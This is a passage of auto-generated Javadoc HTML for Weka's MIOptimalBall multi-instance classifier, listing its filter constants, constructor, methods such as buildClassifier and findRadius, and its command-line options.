</pre>
<p/>
<!-- technical-bibtex-end -->
<!-- options-start -->
Valid options are: <p/>
<pre> -N <num>
Whether to 0=normalize/1=standardize/2=neither.
(default 0=normalize)</pre>
<!-- options-end -->
<P>
<P>
<DL>
<DT><B>Version:</B></DT>
<DD>$Revision: 9144 $</DD>
<DT><B>Author:</B></DT>
<DD>Lin Dong (ld21@cs.waikato.ac.nz)</DD>
<DT><B>See Also:</B><DD><A HREF="../../../serialized-form.html#weka.classifiers.mi.MIOptimalBall">Serialized Form</A></DL>
<HR>
<P>
<!-- =========== FIELD SUMMARY =========== -->
<A NAME="field_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Field Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static int</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#FILTER_NONE">FILTER_NONE</A></B></CODE>
<BR>
No normalization/standardization</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static int</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#FILTER_NORMALIZE">FILTER_NORMALIZE</A></B></CODE>
<BR>
Normalize training data</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static int</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#FILTER_STANDARDIZE">FILTER_STANDARDIZE</A></B></CODE>
<BR>
Standardize training data</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static <A HREF="../../../weka/core/Tag.html" title="class in weka.core">Tag</A>[]</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#TAGS_FILTER">TAGS_FILTER</A></B></CODE>
<BR>
The filter to apply to the training data</TD>
</TR>
</TABLE>
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<A NAME="constructor_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Constructor Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#MIOptimalBall()">MIOptimalBall</A></B>()</CODE>
<BR>
</TD>
</TR>
</TABLE>
<!-- ========== METHOD SUMMARY =========== -->
<A NAME="method_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Method Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#buildClassifier(weka.core.Instances)">buildClassifier</A></B>(<A HREF="../../../weka/core/Instances.html" title="class in weka.core">Instances</A> data)</CODE>
<BR>
Builds the classifier</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#calculateDistance(weka.core.Instances)">calculateDistance</A></B>(<A HREF="../../../weka/core/Instances.html" title="class in weka.core">Instances</A> train)</CODE>
<BR>
calculate the distances from each instance in a positive bag to each bag.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> double[]</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#distributionForInstance(weka.core.Instance)">distributionForInstance</A></B>(<A HREF="../../../weka/core/Instance.html" title="class in weka.core">Instance</A> newBag)</CODE>
<BR>
Computes the distribution for a given multiple instance</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.lang.String</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#filterTypeTipText()">filterTypeTipText</A></B>()</CODE>
<BR>
Returns the tip text for this property</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#findRadius(weka.core.Instances)">findRadius</A></B>(<A HREF="../../../weka/core/Instances.html" title="class in weka.core">Instances</A> train)</CODE>
<BR>
Find the maximum radius for the optimal ball.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../weka/core/Capabilities.html" title="class in weka.core">Capabilities</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#getCapabilities()">getCapabilities</A></B>()</CODE>
<BR>
Returns default capabilities of the classifier.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../weka/core/SelectedTag.html" title="class in weka.core">SelectedTag</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#getFilterType()">getFilterType</A></B>()</CODE>
<BR>
Gets how the training data will be transformed.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../weka/core/Capabilities.html" title="class in weka.core">Capabilities</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#getMultiInstanceCapabilities()">getMultiInstanceCapabilities</A></B>()</CODE>
<BR>
Returns the capabilities of this multi-instance classifier for the
relational data.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.lang.String[]</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#getOptions()">getOptions</A></B>()</CODE>
<BR>
Gets the current settings of the classifier.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.lang.String</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#getRevision()">getRevision</A></B>()</CODE>
<BR>
Returns the revision string.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../weka/core/TechnicalInformation.html" title="class in weka.core">TechnicalInformation</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#getTechnicalInformation()">getTechnicalInformation</A></B>()</CODE>
<BR>
Returns an instance of a TechnicalInformation object, containing
detailed information about the technical background of this class,
e.g., paper reference or book this class is based on.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.lang.String</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#globalInfo()">globalInfo</A></B>()</CODE>
<BR>
Returns a string describing this filter</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.util.Enumeration</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#listOptions()">listOptions</A></B>()</CODE>
<BR>
Returns an enumeration describing the available options.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#main(java.lang.String[])">main</A></B>(java.lang.String[] argv)</CODE>
<BR>
Main method for testing this class.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> double</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#minBagDistance(weka.core.Instance, weka.core.Instance)">minBagDistance</A></B>(<A HREF="../../../weka/core/Instance.html" title="class in weka.core">Instance</A> center,
<A HREF="../../../weka/core/Instance.html" title="class in weka.core">Instance</A> bag)</CODE>
<BR>
Calculate the distance from one data point to a bag</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#setFilterType(weka.core.SelectedTag)">setFilterType</A></B>(<A HREF="../../../weka/core/SelectedTag.html" title="class in weka.core">SelectedTag</A> newType)</CODE>
<BR>
Sets how the training data will be transformed.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#setOptions(java.lang.String[])">setOptions</A></B>(java.lang.String[] options)</CODE>
<BR>
Parses a given list of options.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> double[]</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/MIOptimalBall.html#sortArray(double[])">sortArray</A></B>(double[] distance)</CODE>
<BR>
Sort the array.</TD>
</TR>
</TABLE>
<A NAME="methods_inherited_from_class_weka.classifiers.Classifier"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left"><B>Methods inherited from class weka.classifiers.<A HREF="../../../weka/classifiers/Classifier.html" title="class in weka.classifiers">Classifier</A></B></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE><A HREF="../../../weka/classifiers/Classifier.html#classifyInstance(weka.core.Instance)">classifyInstance</A>, <A HREF="../../../weka/classifiers/Classifier.html#debugTipText()">debugTipText</A>, <A HREF="../../../weka/classifiers/Classifier.html#forName(java.lang.String, java.lang.String[])">forName</A>, <A HREF="../../../weka/classifiers/Classifier.html#getDebug()">getDebug</A>, <A HREF="../../../weka/classifiers/Classifier.html#makeCopies(weka.classifiers.Classifier, int)">makeCopies</A>, <A HREF="../../../weka/classifiers/Classifier.html#makeCopy(weka.classifiers.Classifier)">makeCopy</A>, <A HREF="../../../weka/classifiers/Classifier.html#setDebug(boolean)">setDebug</A></CODE></TD>
</TR>
</TABLE>
<A NAME="methods_inherited_from_class_java.lang.Object"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left"><B>Methods inherited from class java.lang.Object</B></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE>equals, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</CODE></TD>
</TR>
</TABLE>
<P>
<!-- ============ FIELD DETAIL =========== -->
<A NAME="field_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Field Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="FILTER_NORMALIZE"><!-- --></A><H3>
FILTER_NORMALIZE</H3>
<PRE>
public static final int <B>FILTER_NORMALIZE</B></PRE>
<DL>
<DD>Normalize training data
<P>
<DL>
<DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#weka.classifiers.mi.MIOptimalBall.FILTER_NORMALIZE">Constant Field Values</A></DL>
</DL>
<HR>
<A NAME="FILTER_STANDARDIZE"><!-- --></A><H3>
FILTER_STANDARDIZE</H3>
<PRE>
public static final int <B>FILTER_STANDARDIZE</B></PRE>
<DL>
<DD>Standardize training data
<P>
<DL>
<DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#weka.classifiers.mi.MIOptimalBall.FILTER_STANDARDIZE">Constant Field Values</A></DL>
</DL>
<HR>
<A NAME="FILTER_NONE"><!-- --></A><H3>
FILTER_NONE</H3>
<PRE>
public static final int <B>FILTER_NONE</B></PRE>
<DL>
<DD>No normalization/standardization
<P>
<DL>
<DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#weka.classifiers.mi.MIOptimalBall.FILTER_NONE">Constant Field Values</A></DL>
</DL>
<HR>
<A NAME="TAGS_FILTER"><!-- --></A><H3>
TAGS_FILTER</H3>
<PRE>
public static final <A HREF="../../../weka/core/Tag.html" title="class in weka.core">Tag</A>[] <B>TAGS_FILTER</B></PRE>
<DL>
<DD>The filter to apply to the training data
<P>
<DL>
</DL>
</DL>
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<A NAME="constructor_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Constructor Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="MIOptimalBall()"><!-- --></A><H3>
MIOptimalBall</H3>
<PRE>
public <B>MIOptimalBall</B>()</PRE>
<DL>
</DL>
<!-- ============ METHOD DETAIL ========== -->
<A NAME="method_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Method Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="globalInfo()"><!-- --></A><H3>
globalInfo</H3>
<PRE>
public java.lang.String <B>globalInfo</B>()</PRE>
<DL>
<DD>Returns a string describing this filter
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>a description of the filter suitable for
displaying in the explorer/experimenter gui</DL>
</DD>
</DL>
<HR>
<A NAME="getTechnicalInformation()"><!-- --></A><H3>
getTechnicalInformation</H3>
<PRE>
public <A HREF="../../../weka/core/TechnicalInformation.html" title="class in weka.core">TechnicalInformation</A> <B>getTechnicalInformation</B>()</PRE>
<DL>
<DD>Returns an instance of a TechnicalInformation object, containing
detailed information about the technical background of this class,
e.g., paper reference or book this class is based on.
<P>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../weka/core/TechnicalInformationHandler.html#getTechnicalInformation()">getTechnicalInformation</A></CODE> in interface <CODE><A HREF="../../../weka/core/TechnicalInformationHandler.html" title="interface in weka.core">TechnicalInformationHandler</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>the technical information about this class</DL>
</DD>
</DL>
<HR>
<A NAME="getCapabilities()"><!-- --></A><H3>
getCapabilities</H3>
<PRE>
public <A HREF="../../../weka/core/Capabilities.html" title="class in weka.core">Capabilities</A> <B>getCapabilities</B>()</PRE>
<DL>
<DD>Returns default capabilities of the classifier.
<P>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../weka/core/CapabilitiesHandler.html#getCapabilities()">getCapabilities</A></CODE> in interface <CODE><A HREF="../../../weka/core/CapabilitiesHandler.html" title="interface in weka.core">CapabilitiesHandler</A></CODE><DT><B>Overrides:</B><DD><CODE><A HREF="../../../weka/classifiers/Classifier.html#getCapabilities()">getCapabilities</A></CODE> in class <CODE><A HREF="../../../weka/classifiers/Classifier.html" title="class in weka.classifiers">Classifier</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>the capabilities of this classifier<DT><B>See Also:</B><DD><A HREF="../../../weka/core/Capabilities.html" title="class in weka.core"><CODE>Capabilities</CODE></A></DL>
</DD>
</DL>
<HR>
<A NAME="getMultiInstanceCapabilities()"><!-- --></A><H3>
getMultiInstanceCapabilities</H3>
<PRE>
public <A HREF="../../../weka/core/Capabilities.html" title="class in weka.core">Capabilities</A> <B>getMultiInstanceCapabilities</B>()</PRE>
<DL>
<DD>Returns the capabilities of this multi-instance classifier for the
relational data.
<P>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../weka/core/MultiInstanceCapabilitiesHandler.html#getMultiInstanceCapabilities()">getMultiInstanceCapabilities</A></CODE> in interface <CODE><A HREF="../../../weka/core/MultiInstanceCapabilitiesHandler.html" title="interface in weka.core">MultiInstanceCapabilitiesHandler</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>the capabilities of this object<DT><B>See Also:</B><DD><A HREF="../../../weka/core/Capabilities.html" title="class in weka.core"><CODE>Capabilities</CODE></A></DL>
</DD>
</DL>
<HR>
<A NAME="buildClassifier(weka.core.Instances)"><!-- --></A><H3>
buildClassifier</H3>
<PRE>
public void <B>buildClassifier</B>(<A HREF="../../../weka/core/Instances.html" title="class in weka.core">Instances</A> data)
throws java.lang.Exception</PRE>
<DL>
<DD>Builds the classifier
<P>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../weka/classifiers/Classifier.html#buildClassifier(weka.core.Instances)">buildClassifier</A></CODE> in class <CODE><A HREF="../../../weka/classifiers/Classifier.html" title="class in weka.classifiers">Classifier</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>data</CODE> - the training data to be used for generating the
boosted classifier.
<DT><B>Throws:</B>
<DD><CODE>java.lang.Exception</CODE> - if the classifier could not be built successfully</DL>
</DD>
</DL>
<HR>
<A NAME="calculateDistance(weka.core.Instances)"><!-- --></A><H3>
calculateDistance</H3>
<PRE>
public void <B>calculateDistance</B>(<A HREF="../../../weka/core/Instances.html" title="class in weka.core">Instances</A> train)</PRE>
<DL>
<DD>calculate the distances from each instance in a positive bag to each bag.
All result distances are stored in m_Distance[i][j][k], where
m_Distance[i][j][k] refers the distances from the jth instance in ith bag
to the kth bag
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>train</CODE> - the multi-instance dataset (with relational attribute)</DL>
</DD>
</DL>
<HR>
<A NAME="minBagDistance(weka.core.Instance, weka.core.Instance)"><!-- --></A><H3>
minBagDistance</H3>
<PRE>
public double <B>minBagDistance</B>(<A HREF="../../../weka/core/Instance.html" title="class in weka.core">Instance</A> center,
<A HREF="../../../weka/core/Instance.html" title="class in weka.core">Instance</A> bag)</PRE>
<DL>
<DD>Calculate the distance from one data point to a bag
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>center</CODE> - the data point in instance space<DD><CODE>bag</CODE> - the bag
<DT><B>Returns:</B><DD>the double value as the distance.</DL>
</DD>
</DL>
<HR>
<A NAME="findRadius(weka.core.Instances)"><!-- --></A><H3>
findRadius</H3>
<PRE>
public void <B>findRadius</B>(<A HREF="../../../weka/core/Instances.html" title="class in weka.core">Instances</A> train)</PRE>
<DL>
<DD>Find the maximum radius for the optimal ball.
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>train</CODE> - the multi-instance data</DL>
</DD>
</DL>
<HR>
<A NAME="sortArray(double[])"><!-- --></A><H3>
sortArray</H3>
<PRE>
public double[] <B>sortArray</B>(double[] distance)</PRE>
<DL>
<DD>Sort the array.
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>distance</CODE> - the array need to be sorted
<DT><B>Returns:</B><DD>sorted array</DL>
</DD>
</DL>
<HR>
<A NAME="distributionForInstance(weka.core.Instance)"><!-- --></A><H3>
distributionForInstance</H3>
<PRE>
public double[] <B>distributionForInstance</B>(<A HREF="../../../weka/core/Instance.html" title="class in weka.core">Instance</A> newBag)
throws java.lang.Exception</PRE>
<DL>
<DD>Computes the distribution for a given multiple instance
<P>
<DD><DL>
<DT><B>Overrides:</B><DD><CODE><A HREF="../../../weka/classifiers/Classifier.html#distributionForInstance(weka.core.Instance)">distributionForInstance</A></CODE> in class <CODE><A HREF="../../../weka/classifiers/Classifier.html" title="class in weka.classifiers">Classifier</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>newBag</CODE> - the instance for which distribution is computed
<DT><B>Returns:</B><DD>the distribution
<DT><B>Throws:</B>
<DD><CODE>java.lang.Exception</CODE> - if the distribution can't be computed successfully</DL>
</DD>
</DL>
<HR>
<A NAME="listOptions()"><!-- --></A><H3>
listOptions</H3>
<PRE>
public java.util.Enumeration <B>listOptions</B>()</PRE>
<DL>
<DD>Returns an enumeration describing the available options.
<P>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../weka/core/OptionHandler.html#listOptions()">listOptions</A></CODE> in interface <CODE><A HREF="../../../weka/core/OptionHandler.html" title="interface in weka.core">OptionHandler</A></CODE><DT><B>Overrides:</B><DD><CODE><A HREF="../../../weka/classifiers/Classifier.html#listOptions()">listOptions</A></CODE> in class <CODE><A HREF="../../../weka/classifiers/Classifier.html" title="class in weka.classifiers">Classifier</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>an enumeration of all the available options.</DL>
</DD>
</DL>
<HR>
<A NAME="getOptions()"><!-- --></A><H3>
getOptions</H3>
<PRE>
public java.lang.String[] <B>getOptions</B>()</PRE>
<DL>
<DD>Gets the current settings of the classifier.
<P>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../weka/core/OptionHandler.html#getOptions()">getOptions</A></CODE> in interface <CODE><A HREF="../../../weka/core/OptionHandler.html" title="interface in weka.core">OptionHandler</A></CODE><DT><B>Overrides:</B><DD><CODE><A HREF="../../../weka/classifiers/Classifier.html#getOptions()">getOptions</A></CODE> in class <CODE><A HREF="../../../weka/classifiers/Classifier.html" title="class in weka.classifiers">Classifier</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>an array of strings suitable for passing to setOptions</DL>
</DD>
</DL>
<HR>
<A NAME="setOptions(java.lang.String[])"><!-- --></A><H3>
setOptions</H3>
<PRE>
public void <B>setOptions</B>(java.lang.String[] options)
throws java.lang.Exception</PRE>
<DL>
<DD>Parses a given list of options. <p/>
<!-- options-start -->
Valid options are: <p/>
<pre> -N <num>
Whether to 0=normalize/1=standardize/2=neither.
(default 0=normalize)</pre>
<!-- options-end -->
<P>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../weka/core/OptionHandler.html#setOptions(java.lang.String[])">setOptions</A></CODE> in interface <CODE><A HREF="../../../weka/core/OptionHandler.html" title="interface in weka.core">OptionHandler</A></CODE><DT><B>Overrides:</B><DD><CODE><A HREF="../../../weka/classifiers/Classifier.html#setOptions(java.lang.String[])">setOptions</A></CODE> in class <CODE><A HREF="../../../weka/classifiers/Classifier.html" title="class in weka.classifiers">Classifier</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>options</CODE> - the list of options as an array of strings
<DT><B>Throws:</B>
<DD><CODE>java.lang.Exception</CODE> - if an option is not supported</DL>
</DD>
</DL>
<HR>
<A NAME="filterTypeTipText()"><!-- --></A><H3>
filterTypeTipText</H3>
<PRE>
public java.lang.String <B>filterTypeTipText</B>()</PRE>
<DL>
<DD>Returns the tip text for this property
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>tip text for this property suitable for
displaying in the explorer/experimenter gui</DL>
</DD>
</DL>
<HR>
<A NAME="setFilterType(weka.core.SelectedTag)"><!-- --></A><H3>
setFilterType</H3>
<PRE>
public void <B>setFilterType</B>(<A HREF="../../../weka/core/SelectedTag.html" title="class in weka.core">SelectedTag</A> newType)</PRE>
<DL>
<DD>Sets how the training data will be transformed. Should be one of
FILTER_NORMALIZE, FILTER_STANDARDIZE, FILTER_NONE.
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>newType</CODE> - the new filtering mode</DL>
</DD>
</DL>
<HR>
<A NAME="getFilterType()"><!-- --></A><H3>
getFilterType</H3>
<PRE>
public <A HREF="../../../weka/core/SelectedTag.html" title="class in weka.core">SelectedTag</A> <B>getFilterType</B>()</PRE>
<DL>
<DD>Gets how the training data will be transformed. Will be one of
FILTER_NORMALIZE, FILTER_STANDARDIZE, FILTER_NONE.
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>the filtering mode</DL>
</DD>
</DL>
<HR>
<A NAME="getRevision()"><!-- --></A><H3>
getRevision</H3>
<PRE>
public java.lang.String <B>getRevision</B>()</PRE>
<DL>
<DD>Returns the revision string.
<P>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../weka/core/RevisionHandler.html#getRevision()">getRevision</A></CODE> in interface <CODE><A HREF="../../../weka/core/RevisionHandler.html" title="interface in weka.core">RevisionHandler</A></CODE><DT><B>Overrides:</B><DD><CODE><A HREF="../../../weka/classifiers/Classifier.html#getRevision()">getRevision</A></CODE> in class <CODE><A HREF="../../../weka/classifiers/Classifier.html" title="class in weka.classifiers">Classifier</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>the revision</DL>
</DD>
</DL>
<HR>
<A NAME="main(java.lang.String[])"><!-- --></A><H3>
main</H3>
<PRE>
public static void <B>main</B>(java.lang.String[] argv)</PRE>
<DL>
<DD>Main method for testing this class.
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>argv</CODE> - should contain the command line arguments to the
scheme (see Evaluation)</DL>
</DD>
</DL>
<!-- ========= END OF CLASS DATA ========= -->
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="http://www.cs.waikato.ac.nz/ml/weka/" target="_blank"><FONT CLASS="NavBarFont1"><B>Weka's home</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../weka/classifiers/mi/MINND.html" title="class in weka.classifiers.mi"><B>PREV CLASS</B></A>
